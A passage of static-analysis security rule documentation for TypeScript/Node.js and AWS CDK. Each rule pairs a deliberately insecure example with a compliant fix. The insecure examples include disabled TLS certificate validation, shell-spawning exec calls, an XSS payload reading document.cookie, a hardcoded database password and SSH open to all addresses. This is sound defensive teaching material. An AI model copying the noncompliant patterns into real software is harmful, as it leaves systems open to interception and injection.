Do not try to create a blacklist of dangerous code. It is impossible to cover all attacks that way.

Avoid using dynamic code APIs whenever possible. Hard-coded code is always safer.

Sensitive Code Example

let value = eval('obj.' + propName); // Sensitive
let func = Function('obj' + propName); // Sensitive
location.href = 'javascript:void(0)'; // Sensitive

Exceptions

This rule will not raise an issue when the argument of the eval or Function is a literal string as it is reasonably safe.

See

typescript:S4721

Arbitrary OS command injection vulnerabilities are more likely when a shell is spawned rather than a new process, indeed shell meta-chars can be used (when parameters are user-controlled for instance) to inject OS commands.

Ask Yourself Whether

  • OS command name or parameters are user-controlled.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Use functions that don’t spawn a shell.

Sensitive Code Example

const cp = require('child_process');

// A shell will be spawn in these following cases:
cp.exec(cmd); // Sensitive
cp.execSync(cmd); // Sensitive

cp.spawn(cmd, { shell: true }); // Sensitive
cp.spawnSync(cmd, { shell: true }); // Sensitive
cp.execFile(cmd, { shell: true }); // Sensitive
cp.execFileSync(cmd, { shell: true }); // Sensitive

Compliant Solution

const cp = require('child_process');

cp.spawnSync("/usr/bin/file.exe", { shell: false }); // Compliant

See

typescript:S5148

A newly opened window having access back to the originating window could allow basic phishing attacks (the window.opener object is not null and thus window.opener.location can be set to a malicious website by the opened page).

For instance, an attacker can put a link (say: "http://example.com/mylink") on a popular website that changes, when opened, the original page to "http://example.com/fake_login". On "http://example.com/fake_login" there is a fake login page which could trick real users to enter their credentials.

Ask Yourself Whether

  • The application opens untrusted external URL.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Use noopener to prevent untrusted pages from abusing window.opener.

Note: In Chrome 88+, Firefox 79+ or Safari 12.1+ target=_blank on anchors implies rel=noopener which make the protection enabled by default.

Sensitive Code Example

window.open("https://example.com/dangerous");

Compliant Solution

window.open("https://example.com/dangerous", "WindowName", "noopener");

See

typescript:S1313

Hardcoding IP addresses is security-sensitive. It has led in the past to the following vulnerabilities:

Today’s services have an ever-changing architecture due to their scaling and redundancy needs. It is a mistake to think that a service will always have the same IP address. When it does change, the hardcoded IP will have to be modified too. This will have an impact on the product development, delivery, and deployment:

  • The developers will have to do a rapid fix every time this happens, instead of having an operation team change a configuration file.
  • It misleads to use the same address in every environment (dev, sys, qa, prod).

Last but not least it has an effect on application security. Attackers might be able to decompile the code and thereby discover a potentially sensitive address. They can perform a Denial of Service attack on the service, try to get access to the system, or try to spoof the IP address to bypass security checks. Such attacks can always be possible, but in the case of a hardcoded IP address solving the issue will take more time, which will increase an attack’s impact.

Ask Yourself Whether

The disclosed IP address is sensitive, e.g.:

  • Can give information to an attacker about the network topology.
  • It’s a personal (assigned to an identifiable person) IP address.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Don’t hard-code the IP address in the source code, instead make it configurable with environment variables, configuration files, or a similar approach. Alternatively, if confidentially is not required a domain name can be used since it allows to change the destination quickly without having to rebuild the software.

Sensitive Code Example

ip = "192.168.12.42"; // Sensitive

const net = require('net');
var client = new net.Socket();
client.connect(80, ip, function() {
  // ...
});

Compliant Solution

ip = process.env.IP_ADDRESS; // Compliant

const net = require('net');
var client = new net.Socket();
client.connect(80, ip, function() {
  // ...
});

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Loopback addresses 127.0.0.0/8 in CIDR notation (from 127.0.0.0 to 127.255.255.255)
  • Broadcast address 255.255.255.255
  • Non routable address 0.0.0.0
  • Strings of the form 2.5.<number>.<number> as they often match Object Identifiers (OID).
  • Addresses in the ranges 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24, reserved for documentation purposes by RFC 5737
  • Addresses in the 2001:db8::/32 range, reserved for documentation purposes by RFC 3849

See

typescript:S6327

Amazon Simple Notification Service (SNS) is a managed messaging service for application-to-application (A2A) and application-to-person (A2P) communication. SNS topics allows publisher systems to fanout messages to a large number of subscriber systems. Amazon SNS allows to encrypt messages when they are received. In the case that adversaries gain physical access to the storage medium or otherwise leak a message they are not able to access the data.

Ask Yourself Whether

  • The topic contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt SNS topics that contain sensitive information. Encryption and decryption are handled transparently by SNS, so no further modifications to the application are necessary.

Sensitive Code Example

For aws_cdk.aws_sns.Topic

import { Topic } from 'aws-cdk-lib/aws-sns';

new Topic(this, 'exampleTopic'); // Sensitive

For aws_cdk.aws_sns.CfnTopic

import { Topic, CfnTopic } from 'aws-cdk-lib/aws-sns';

new CfnTopic(this, 'exampleCfnTopic'); // Sensitive

Compliant Solution

For aws_cdk.aws_sns.Topic

import { Topic } from 'aws-cdk-lib/aws-sns';

const encryptionKey = new Key(this, 'exampleKey', {
    enableKeyRotation: true,
});

new Topic(this, 'exampleTopic', {
    masterKey: encryptionKey
});

For aws_cdk.aws_sns.CfnTopic

import { CfnTopic } from 'aws-cdk-lib/aws-sns';

const encryptionKey = new Key(this, 'exampleKey', {
    enableKeyRotation: true,
});

cfnTopic = new CfnTopic(this, 'exampleCfnTopic', {
    kmsMasterKeyId: encryptionKey.keyId
});

See

typescript:S6329

Enabling public network access to cloud resources can affect an organization’s ability to protect its data or internal operations from data theft or disruption.

Depending on the component, inbound access from the Internet can be enabled via:

  • a boolean value that explicitly allows access to the public network.
  • the assignment of a public IP address.
  • database firewall rules that allow public IP ranges.

Deciding to allow public access may happen for various reasons such as for quick maintenance, time saving, or by accident.

This decision increases the likelihood of attacks on the organization, such as:

  • data breaches.
  • intrusions into the infrastructure to permanently steal from it.
  • and various malicious traffic, such as DDoS attacks.

Ask Yourself Whether

This cloud resource:

  • should be publicly accessible to any Internet user.
  • requires inbound traffic from the Internet to function properly.

There is a risk if you answered no to any of those questions.

Recommended Secure Coding Practices

Avoid publishing cloud services on the Internet unless they are intended to be publicly accessible, such as customer portals or e-commerce sites.

Use private networks (and associated private IP addresses) and VPC peering or other secure communication tunnels to communicate with other cloud components.

The goal is to prevent the component from intercepting traffic coming in via the public IP address. If the cloud resource does not support the absence of a public IP address, assign a public IP address to it, but do not create listeners for the public IP address.

Sensitive Code Example

For aws-cdk-lib.aws_ec2.Instance and similar constructs:

import {aws_ec2 as ec2} from 'aws-cdk-lib'

new ec2.Instance(this, "example", {
    instanceType: nanoT2,
    machineImage: ec2.MachineImage.latestAmazonLinux(),
    vpc: vpc,
    vpcSubnets: {subnetType: ec2.SubnetType.PUBLIC} // Sensitive
})

For aws-cdk-lib.aws_ec2.CfnInstance:

import {aws_ec2 as ec2} from 'aws-cdk-lib'

new ec2.CfnInstance(this, "example", {
    instanceType: "t2.micro",
    imageId: "ami-0ea0f26a6d50850c5",
    networkInterfaces: [
        {
            deviceIndex: "0",
            associatePublicIpAddress: true, // Sensitive
            deleteOnTermination: true,
            subnetId: vpc.selectSubnets({subnetType: ec2.SubnetType.PUBLIC}).subnetIds[0]
        }
    ]
})

For aws-cdk-lib.aws_dms.CfnReplicationInstance:

import {aws_ec2 as ec2} from 'aws-cdk-lib'

new dms.CfnReplicationInstance(
    this, "example", {
    replicationInstanceClass: "dms.t2.micro",
    allocatedStorage: 5,
    publiclyAccessible: true, // Sensitive
    replicationSubnetGroupIdentifier: subnetGroup.replicationSubnetGroupIdentifier,
    vpcSecurityGroupIds: [vpc.vpcDefaultSecurityGroup]
})

For aws-cdk-lib.aws_rds.CfnDBInstance:

import {aws_ec2 as ec2} from 'aws-cdk-lib'

const rdsSubnetGroupPublic = new rds.CfnDBSubnetGroup(this, "publicSubnet", {
    dbSubnetGroupDescription: "Subnets",
    dbSubnetGroupName: "publicSn",
    subnetIds: vpc.selectSubnets({
        subnetType: ec2.SubnetType.PUBLIC
    }).subnetIds
})

new rds.CfnDBInstance(this, "example", {
    engine: "postgres",
    masterUsername: "foobar",
    masterUserPassword: "12345678",
    dbInstanceClass: "db.r5.large",
    allocatedStorage: "200",
    iops: 1000,
    dbSubnetGroupName: rdsSubnetGroupPublic.ref,
    publiclyAccessible: true, // Sensitive
    vpcSecurityGroups: [sg.securityGroupId]
})

Compliant Solution

For aws-cdk-lib.aws_ec2.Instance and similar constructs:

import {aws_ec2 as ec2} from 'aws-cdk-lib'

new ec2.Instance(
    this,
    "example", {
    instanceType: nanoT2,
    machineImage: ec2.MachineImage.latestAmazonLinux(),
    vpc: vpc,
    vpcSubnets: {subnetType: ec2.SubnetType.PRIVATE_WITH_EGRESS}
})

For aws-cdk-lib.aws_ec2.CfnInstance:

import {aws_ec2 as ec2} from 'aws-cdk-lib'

new ec2.CfnInstance(this, "example", {
    instanceType: "t2.micro",
    imageId: "ami-0ea0f26a6d50850c5",
    networkInterfaces: [
        {
            deviceIndex: "0",
            associatePublicIpAddress: false,
            deleteOnTermination: true,
            subnetId: vpc.selectSubnets({subnetType: ec2.SubnetType.PRIVATE_WITH_EGRESS}).subnetIds[0]
        }
    ]
})

For aws-cdk-lib.aws_dms.CfnReplicationInstance:

import {aws_ec2 as ec2} from 'aws-cdk-lib'

new dms.CfnReplicationInstance(
    this, "example", {
    replicationInstanceClass: "dms.t2.micro",
    allocatedStorage: 5,
    publiclyAccessible: false,
    replicationSubnetGroupIdentifier: subnetGroup.replicationSubnetGroupIdentifier,
    vpcSecurityGroupIds: [vpc.vpcDefaultSecurityGroup]
})

For aws-cdk-lib.aws_rds.CfnDBInstance:

import {aws_ec2 as ec2} from 'aws-cdk-lib'

const rdsSubnetGroupPrivate = new rds.CfnDBSubnetGroup(this, "example",{
    dbSubnetGroupDescription: "Subnets",
    dbSubnetGroupName: "privateSn",
    subnetIds: vpc.selectSubnets({
        subnetType: ec2.SubnetType.PRIVATE_WITH_EGRESS
    }).subnetIds
})

new rds.CfnDBInstance(this, "example", {
    engine: "postgres",
    masterUsername: "foobar",
    masterUserPassword: "12345678",
    dbInstanceClass: "db.r5.large",
    allocatedStorage: "200",
    iops: 1000,
    dbSubnetGroupName: rdsSubnetGroupPrivate.ref,
    publiclyAccessible: false,
    vpcSecurityGroups: [sg.securityGroupId]
})

See

typescript:S4829

This rule is deprecated, and will eventually be removed.

Reading Standard Input is security-sensitive. It has led in the past to the following vulnerabilities:

It is common for attackers to craft inputs enabling them to exploit software vulnerabilities. Thus any data read from the standard input (stdin) can be dangerous and should be validated.

This rule flags code that reads from the standard input.

Ask Yourself Whether

  • data read from the standard input is not sanitized before being used.

You are at risk if you answered yes to this question.

Recommended Secure Coding Practices

Sanitize all data read from the standard input before using it.

Sensitive Code Example

// The process object is a global that provides information about, and control over, the current Node.js process
// All uses of process.stdin are security-sensitive and should be reviewed

process.stdin.on('readable', () => {
	const chunk = process.stdin.read(); // Sensitive
	if (chunk !== null) {
		dosomething(chunk);
	}
});

const readline = require('readline');
readline.createInterface({
	input: process.stdin // Sensitive
}).on('line', (input) => {
	dosomething(input);
});

See

typescript:S4823

This rule is deprecated, and will eventually be removed.

Using command line arguments is security-sensitive. It has led in the past to the following vulnerabilities:

Command line arguments can be dangerous just like any other user input. They should never be used without being first validated and sanitized.

Remember also that any user can retrieve the list of processes running on a system, which makes the arguments provided to them visible. Thus passing sensitive information via command line arguments should be considered as insecure.

This rule raises an issue when on every program entry points (main methods) when command line arguments are used. The goal is to guide security code reviews.

Ask Yourself Whether

  • any of the command line arguments are used without being sanitized first.
  • your application accepts sensitive information via command line arguments.

If you answered yes to any of these questions you are at risk.

Recommended Secure Coding Practices

Sanitize all command line arguments before using them.

Any user or application can list running processes and see the command line arguments they were started with. There are safer ways of providing sensitive information to an application than exposing them in the command line. It is common to write them on the process' standard input, or give the path to a file containing the information.

Sensitive Code Example

// The process object is a global that provides information about, and control over, the current Node.js process
var param = process.argv[2]; // Sensitive: check how the argument is used
console.log('Param: ' + param);

See

typescript:S6321

Why is this an issue?

Cloud platforms such as AWS, Azure, or GCP support virtual firewalls that can be used to restrict access to services by controlling inbound and outbound traffic.
Any firewall rule allowing traffic from all IP addresses to standard network ports on which administration services traditionally listen, such as 22 for SSH, can expose these services to exploits and unauthorized access.

What is the potential impact?

Like any other service, administration services can contain vulnerabilities. Administration services run with elevated privileges and thus a vulnerability could have a high impact on the system.

Additionally, credentials might be leaked through phishing or similar techniques. Attackers who are able to reach the services could use the credentials to log in to the system.

How to fix it

It is recommended to restrict access to remote administration services to only trusted IP addresses. In practice, trusted IP addresses are those held by system administrators or those of bastion-like servers.

Code examples

Noncompliant code example

For aws-cdk-lib.aws_ec2.Instance and other constructs that support a connections attribute:

import {aws_ec2 as ec2} from 'aws-cdk-lib'

const instance = new ec2.Instance(this, "default-own-security-group",{
    instanceType: nanoT2,
    machineImage: ec2.MachineImage.latestAmazonLinux(),
    vpc: vpc,
    instanceName: "test-instance"
})

instance.connections.allowFrom(
    ec2.Peer.anyIpv4(), // Noncompliant
    ec2.Port.tcp(22),
    /*description*/ "Allows SSH from all IPv4"
)

For aws-cdk-lib.aws_ec2.SecurityGroup

import {aws_ec2 as ec2} from 'aws-cdk-lib'

const securityGroup = new ec2.SecurityGroup(this, "custom-security-group", {
    vpc: vpc
})

securityGroup.addIngressRule(
    ec2.Peer.anyIpv4(), // Noncompliant
    ec2.Port.tcpRange(1, 1024)
)

For aws-cdk-lib.aws_ec2.CfnSecurityGroup

import {aws_ec2 as ec2} from 'aws-cdk-lib'

new ec2.CfnSecurityGroup(
    this,
    "cfn-based-security-group", {
        groupDescription: "cfn based security group",
        groupName: "cfn-based-security-group",
        vpcId: vpc.vpcId,
        securityGroupIngress: [
            {
                ipProtocol: "6",
                cidrIp: "0.0.0.0/0", // Noncompliant
                fromPort: 22,
                toPort: 22
            }
        ]
    }
)

For aws-cdk-lib.aws_ec2.CfnSecurityGroupIngress

import {aws_ec2 as ec2} from 'aws-cdk-lib'

new ec2.CfnSecurityGroupIngress( // Noncompliant
    this,
    "ingress-all-ip-tcp-ssh", {
        ipProtocol: "tcp",
        cidrIp: "0.0.0.0/0",
        fromPort: 22,
        toPort: 22,
        groupId: securityGroup.attrGroupId
})

Compliant solution

For aws-cdk-lib.aws_ec2.Instance and other constructs that support a connections attribute:

import {aws_ec2 as ec2} from 'aws-cdk-lib'

const instance = new ec2.Instance(this, "default-own-security-group",{
    instanceType: nanoT2,
    machineImage: ec2.MachineImage.latestAmazonLinux(),
    vpc: vpc,
    instanceName: "test-instance"
})

instance.connections.allowFrom(
    ec2.Peer.ipv4("192.0.2.0/24"),
    ec2.Port.tcp(22),
    /*description*/ "Allows SSH from a trusted range"
)

For aws-cdk-lib.aws_ec2.SecurityGroup

import {aws_ec2 as ec2} from 'aws-cdk-lib'

const securityGroup3 = new ec2.SecurityGroup(this, "custom-security-group", {
    vpc: vpc
})

securityGroup3.addIngressRule(
    ec2.Peer.anyIpv4(),
    ec2.Port.tcpRange(1024, 1048)
)

For aws-cdk-lib.aws_ec2.CfnSecurityGroup

import {aws_ec2 as ec2} from 'aws-cdk-lib'

new ec2.CfnSecurityGroup(
    this,
    "cfn-based-security-group", {
        groupDescription: "cfn based security group",
        groupName: "cfn-based-security-group",
        vpcId: vpc.vpcId,
        securityGroupIngress: [
            {
                ipProtocol: "6",
                cidrIp: "192.0.2.0/24",
                fromPort: 22,
                toPort: 22
            }
        ]
    }
)

For aws-cdk-lib.aws_ec2.CfnSecurityGroupIngress

new ec2.CfnSecurityGroupIngress(
    this,
    "ingress-all-ipv4-tcp-http", {
        ipProtocol: "6",
        cidrIp: "0.0.0.0/0",
        fromPort: 80,
        toPort: 80,
        groupId: securityGroup.attrGroupId
    }
)

Resources

Documentation

Standards

typescript:S4830

This vulnerability makes it possible that an encrypted communication is intercepted.

Why is this an issue?

Transport Layer Security (TLS) provides secure communication between systems over the internet by encrypting the data sent between them. The role of certificate validation in this process is to ensure that a system is indeed the one it claims to be, adding an extra layer of trust and security.

When certificate validation is disabled, the client skips this critical check. This creates an opportunity for attackers to pose as a trusted entity and intercept, manipulate, or steal the data being transmitted.

What is the potential impact?

Establishing trust in a secure way is a non-trivial task. When you disable certificate validation, you are removing a key mechanism designed to build this trust in internet communication, opening your system up to a number of potential threats.

Identity spoofing

If a system does not validate certificates, it cannot confirm the identity of the other party involved in the communication. An attacker can exploit this by creating a fake server and masquerading it as a legitimate one. For example, they might set up a server that looks like your bank’s server, tricking your system into thinking it is communicating with the bank. This scenario, called identity spoofing, allows the attacker to collect any data your system sends to them, potentially leading to significant data breaches.

Loss of data integrity

When TLS certificate validation is disabled, the integrity of the data you send and receive cannot be guaranteed. An attacker could modify the data in transit, and you would have no way of knowing. This could range from subtle manipulations of the data you receive to the injection of malicious code or malware into your system. The consequences of such breaches of data integrity can be severe, depending on the nature of the data and the system.

How to fix it in Node.js

Code examples

The following code contains examples of disabled certificate validation.

The certificate validation gets disabled by setting rejectUnauthorized to false. To enable validation set the value to true or do not set rejectUnauthorized at all to use the secure default value.

Noncompliant code example

const https = require('node:https');

let options = {
  hostname: 'www.example.com',
  port: 443,
  path: '/',
  method: 'GET',
  rejectUnauthorized: false,
  secureProtocol: 'TLSv1_2_method'
};

let req = https.request(options, (res) => {
  res.on('data', (d) => {
    process.stdout.write(d);
  });
}); // Noncompliant
const tls = require('node:tls');

let options = {
    rejectUnauthorized: false,
    secureProtocol: 'TLSv1_2_method'
};

let socket = tls.connect(443, "www.example.com", options, () => {
  process.stdin.pipe(socket);
  process.stdin.resume();
}); // Noncompliant

Compliant solution

const https = require('node:https');

let options = {
  hostname: 'www.example.com',
  port: 443,
  path: '/',
  method: 'GET',
  secureProtocol: 'TLSv1_2_method'
};

let req = https.request(options, (res) => {
  res.on('data', (d) => {
    process.stdout.write(d);
  });
});
const tls = require('node:tls');

let options = {
    secureProtocol: 'TLSv1_2_method'
};

let socket = tls.connect(443, "www.example.com", options, () => {
  process.stdin.pipe(socket);
  process.stdin.resume();
});

How does this work?

Addressing the vulnerability of disabled TLS certificate validation primarily involves re-enabling the default validation.

To avoid running into problems with invalid certificates, consider the following sections.

Using trusted certificates

If possible, always use a certificate issued by a well-known, trusted CA for your server. Most programming environments come with a predefined list of trusted root CAs, and certificates issued by these authorities are validated automatically. This is the best practice, and it requires no additional code or configuration.

Working with self-signed certificates or non-standard CAs

In some cases, you might need to work with a server using a self-signed certificate, or a certificate issued by a CA not included in your trusted roots. Rather than disabling certificate validation in your code, you can add the necessary certificates to your trust store.

Resources

Standards

typescript:S4036

When executing an OS command and unless you specify the full path to the executable, then the locations in your application’s PATH environment variable will be searched for the executable. That search could leave an opening for an attacker if one of the elements in PATH is a directory under his control.

Ask Yourself Whether

  • The directories in the PATH environment variable may be defined by not trusted entities.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Fully qualified/absolute path should be used to specify the OS command to execute.

Sensitive Code Example

const cp = require('child_process');
cp.exec('file.exe'); // Sensitive

Compliant Solution

const cp = require('child_process');
cp.exec('/usr/bin/file.exe'); // Compliant

See

typescript:S6333

Creating APIs without authentication unnecessarily increases the attack surface on the target infrastructure.

Unless another authentication method is used, attackers have the opportunity to attempt attacks against the underlying API.
This means attacks both on the functionality provided by the API and its infrastructure.

Ask Yourself Whether

  • The underlying API exposes all of its contents to any anonymous Internet user.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

In general, prefer limiting API access to a specific set of people or entities.

AWS provides multiple methods to do so:

  • AWS_IAM, to use standard AWS IAM roles and policies.
  • COGNITO_USER_POOLS, to use customizable OpenID Connect (OIDC) identity providers (IdP).
  • CUSTOM, to use an AWS-independant OIDC provider, glued to the infrastructure with a Lambda authorizer.

Sensitive Code Example

For aws-cdk-lib.aws_apigateway.Resource:

import {aws_apigateway as apigateway} from "aws-cdk-lib"

const resource = api.root.addResource("example")
resource.addMethod(
    "GET",
    new apigateway.HttpIntegration("https://example.org"),
    {
        authorizationType: apigateway.AuthorizationType.NONE // Sensitive
    }
)

For aws-cdk-lib.aws_apigatewayv2.CfnRoute:

import {aws_apigatewayv2 as apigateway} from "aws-cdk-lib"

new apigateway.CfnRoute(this, "no-auth", {
    apiId: api.ref,
    routeKey: "GET /no-auth",
    authorizationType: "NONE", // Sensitive
    target: exampleIntegration
})

Compliant Solution

For aws-cdk-lib.aws_apigateway.Resource:

import {aws_apigateway as apigateway} from "aws-cdk-lib"

const resource = api.root.addResource("example",{
    defaultMethodOptions:{
        authorizationType: apigateway.AuthorizationType.IAM
    }
})
resource.addMethod(
    "POST",
    new apigateway.HttpIntegration("https://example.org"),
    {
        authorizationType: apigateway.AuthorizationType.IAM
    }
)
resource.addMethod(  // authorizationType is inherited from the Resource's configured defaultMethodOptions
    "GET"
)

For aws-cdk-lib.aws_apigatewayv2.CfnRoute:

import {aws_apigatewayv2 as apigateway} from "aws-cdk-lib"

new apigateway.CfnRoute(this, "auth", {
    apiId: api.ref,
    routeKey: "POST /auth",
    authorizationType: "AWS_IAM",
    target: exampleIntegration
})

See

typescript:S5247

To reduce the risk of cross-site scripting attacks, templating systems, such as Twig, Django, Smarty, Groovy's template engine, allow configuration of automatic variable escaping before rendering templates. When escape occurs, characters that make sense to the browser (eg: <a>) will be transformed/replaced with escaped/sanitized values (eg: & lt;a& gt; ).

Auto-escaping is not a magic feature to annihilate all cross-site scripting attacks, it depends on the strategy applied and the context, for example a "html auto-escaping" strategy (which only transforms html characters into html entities) will not be relevant when variables are used in a html attribute because ':' character is not escaped and thus an attack as below is possible:

<a href="{{ myLink }}">link</a> // myLink = javascript:alert(document.cookie)
<a href="javascript:alert(document.cookie)">link</a> // JS injection (XSS attack)

Ask Yourself Whether

  • Templates are used to render web content and
    • dynamic variables in templates come from untrusted locations or are user-controlled inputs
    • there is no local mechanism in place to sanitize or validate the inputs.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Enable auto-escaping by default and continue to review the use of inputs in order to be sure that the chosen auto-escaping strategy is the right one.

Sensitive Code Example

mustache.js template engine:

let Mustache = require("mustache");

Mustache.escape = function(text) {return text;}; // Sensitive

let rendered = Mustache.render(template, { name: inputName });

handlebars.js template engine:

const Handlebars = require('handlebars');

let source = "<p>attack {{name}}</p>";

let template = Handlebars.compile(source, { noEscape: true }); // Sensitive

markdown-it markup language parser:

const markdownIt = require('markdown-it');
let md = markdownIt({
  html: true // Sensitive
});

let result = md.render('# <b>attack</b>');

marked markup language parser:

const marked = require('marked');

marked.setOptions({
  renderer: new marked.Renderer(),
  sanitize: false // Sensitive
});

console.log(marked("# test <b>attack/b>"));

kramed markup language parser:

let kramed = require('kramed');

var options = {
  renderer: new kramed.Renderer({
    sanitize: false // Sensitive
  })
};

Compliant Solution

mustache.js template engine:

let Mustache = require("mustache");

let rendered = Mustache.render(template, { name: inputName }); // Compliant autoescaping is on by default

handlebars.js template engine:

const Handlebars = require('handlebars');

let source = "<p>attack {{name}}</p>";
let data = { "name": "<b>Alan</b>" };

let template = Handlebars.compile(source); // Compliant by default noEscape is set to false

markdown-it markup language parser:

let md = require('markdown-it')(); // Compliant by default html is set to false

let result = md.render('# <b>attack</b>');

marked markup language parser:

const marked = require('marked');

marked.setOptions({
  renderer: new marked.Renderer()
}); // Compliant by default sanitize is set to true

console.log(marked("# test <b>attack/b>"));

kramed markup language parser:

let kramed = require('kramed');

let options = {
  renderer: new kramed.Renderer({
    sanitize: true // Compliant
  })
};

console.log(kramed('Attack [xss?](javascript:alert("xss")).', options));

See

typescript:S6330

Amazon Simple Queue Service (SQS) is a managed message queuing service for application-to-application (A2A) communication. Amazon SQS can store messages encrypted as soon as they are received. In the case that adversaries gain physical access to the storage medium or otherwise leak a message from the file system, for example through a vulnerability in the service, they are not able to access the data.

Ask Yourself Whether

  • The queue contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt SQS queues that contain sensitive information. Encryption and decryption are handled transparently by SQS, so no further modifications to the application are necessary.

Sensitive Code Example

For aws-cdk-lib.aws-sqs.Queue

import { Queue } from 'aws-cdk-lib/aws-sqs';

new Queue(this, 'example'); // Sensitive

For aws-cdk-lib.aws-sqs.CfnQueue

import { CfnQueue } from 'aws-cdk-lib/aws-sqs';

new CfnQueue(this, 'example'); // Sensitive

Compliant Solution

For aws-cdk-lib.aws-sqs.Queue

import { Queue } from 'aws-cdk-lib/aws-sqs';

new Queue(this, 'example', {
    encryption: QueueEncryption.KMS_MANAGED
});

For aws-cdk-lib.aws-sqs.CfnQueue

import { CfnQueue } from 'aws-cdk-lib/aws-sqs';

const encryptionKey = new Key(this, 'example', {
    enableKeyRotation: true,
});

new CfnQueue(this, 'example', {
    kmsMasterKeyId: encryptionKey.keyId
});

See

typescript:S5122

Having a permissive Cross-Origin Resource Sharing policy is security-sensitive. It has led in the past to the following vulnerabilities:

Same origin policy in browsers prevents, by default and for security-reasons, a javascript frontend to perform a cross-origin HTTP request to a resource that has a different origin (domain, protocol, or port) from its own. The requested target can append additional HTTP headers in response, called CORS, that act like directives for the browser and change the access control policy / relax the same origin policy.

Ask Yourself Whether

  • You don’t trust the origin specified, example: Access-Control-Allow-Origin: untrustedwebsite.com.
  • Access control policy is entirely disabled: Access-Control-Allow-Origin: *
  • Your access control policy is dynamically defined by a user-controlled input like origin header.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • The Access-Control-Allow-Origin header should be set only for a trusted origin and for specific resources.
  • Allow only selected, trusted domains in the Access-Control-Allow-Origin header. Prefer whitelisting domains over blacklisting or allowing any domain (do not use * wildcard nor blindly return the Origin header content without any checks).

Sensitive Code Example

nodejs http built-in module:

const http = require('http');
const srv = http.createServer((req, res) => {
  res.writeHead(200, { 'Access-Control-Allow-Origin': '*' }); // Sensitive
  res.end('ok');
});
srv.listen(3000);

Express.js framework with cors middleware:

const cors = require('cors');

let app1 = express();
app1.use(cors()); // Sensitive: by default origin is set to *

let corsOptions = {
  origin: '*' // Sensitive
};

let app2 = express();
app2.use(cors(corsOptions));

User-controlled origin:

function (req, res) {
  const origin = req.header('Origin');
  res.setHeader('Access-Control-Allow-Origin', origin); // Sensitive
};

Compliant Solution

nodejs http built-in module:

const http = require('http');
const srv = http.createServer((req, res) => {
  res.writeHead(200, { 'Access-Control-Allow-Origin': 'trustedwebsite.com' }); // Compliant
  res.end('ok');
});
srv.listen(3000);

Express.js framework with cors middleware:

const cors = require('cors');

let corsOptions = {
  origin: 'trustedwebsite.com' // Compliant
};

let app = express();
app.use(cors(corsOptions));

User-controlled origin validated with an allow-list:

function (req, res) {
  const origin = req.header('Origin');

  if (trustedOrigins.indexOf(origin) >= 0) {
    res.setHeader('Access-Control-Allow-Origin', origin);
  }
};

See

typescript:S6332

Amazon Elastic File System (EFS) is a serverless file system that does not require provisioning or managing storage. Stored files can be automatically encrypted by the service. In the case that adversaries gain physical access to the storage medium or otherwise leak a message they are not able to access the data.

Ask Yourself Whether

  • The file system contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt EFS file systems that contain sensitive information. Encryption and decryption are handled transparently by EFS, so no further modifications to the application are necessary.

Sensitive Code Example

For aws_cdk.aws_efs.FileSystem

import { FileSystem } from 'aws-cdk-lib/aws-efs';

new FileSystem(this, 'unencrypted-explicit', {
    vpc: new Vpc(this, 'VPC'),
    encrypted: false // Sensitive
});

For aws_cdk.aws_efs.CfnFileSystem

import { CfnFileSystem } from 'aws-cdk-lib/aws-efs';

new CfnFileSystem(this, 'unencrypted-implicit-cfn', {
}); // Sensitive as encryption is disabled by default

Compliant Solution

For aws_cdk.aws_efs.FileSystem

import { FileSystem } from 'aws-cdk-lib/aws-efs';

new FileSystem(this, 'encrypted-explicit', {
    vpc: new Vpc(this, 'VPC'),
    encrypted: true
});

For aws_cdk.aws_efs.CfnFileSystem

import { CfnFileSystem } from 'aws-cdk-lib/aws-efs';

new CfnFileSystem(this, 'encrypted-explicit-cfn', {
    encrypted: true
});

See

typescript:S2092

When a cookie is protected with the secure attribute set to true it will not be send by the browser over an unencrypted HTTP request and thus cannot be observed by an unauthorized person during a man-in-the-middle attack.

Ask Yourself Whether

  • the cookie is for instance a session-cookie not designed to be sent over non-HTTPS communication.
  • it’s not sure that the website contains mixed content or not (ie HTTPS everywhere or not)

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • It is recommended to use HTTPs everywhere so setting the secure flag to true should be the default behaviour when creating cookies.
  • Set the secure flag to true for session-cookies.

Sensitive Code Example

cookie-session module:

let session = cookieSession({
  secure: false,// Sensitive
});  // Sensitive

express-session module:

const express = require('express');
const session = require('express-session');

let app = express();
app.use(session({
  cookie:
  {
    secure: false // Sensitive
  }
}));

cookies module:

let cookies = new Cookies(req, res, { keys: keys });

cookies.set('LastVisit', new Date().toISOString(), {
  secure: false // Sensitive
}); // Sensitive

csurf module:

const cookieParser = require('cookie-parser');
const csrf = require('csurf');
const express = require('express');

let csrfProtection = csrf({ cookie: { secure: false }}); // Sensitive

Compliant Solution

cookie-session module:

let session = cookieSession({
  secure: true,// Compliant
});  // Compliant

express-session module:

const express = require('express');
const session = require('express-session');

let app = express();
app.use(session({
  cookie:
  {
    secure: true // Compliant
  }
}));

cookies module:

let cookies = new Cookies(req, res, { keys: keys });

cookies.set('LastVisit', new Date().toISOString(), {
  secure: true // Compliant
}); // Compliant

csurf module:

const cookieParser = require('cookie-parser');
const csrf = require('csurf');
const express = require('express');

let csrfProtection = csrf({ cookie: { secure: true }}); // Compliant

See

flex:S1466

Why is this an issue?

The Security.exactSettings value should remain set at the default value of true. Setting this value to false could make the SWF vulnerable to cross-domain attacks.

Noncompliant code example

Security.exactSettings = false;

Compliant solution

Security.exactSettings = true;
flex:S1465

Why is this an issue?

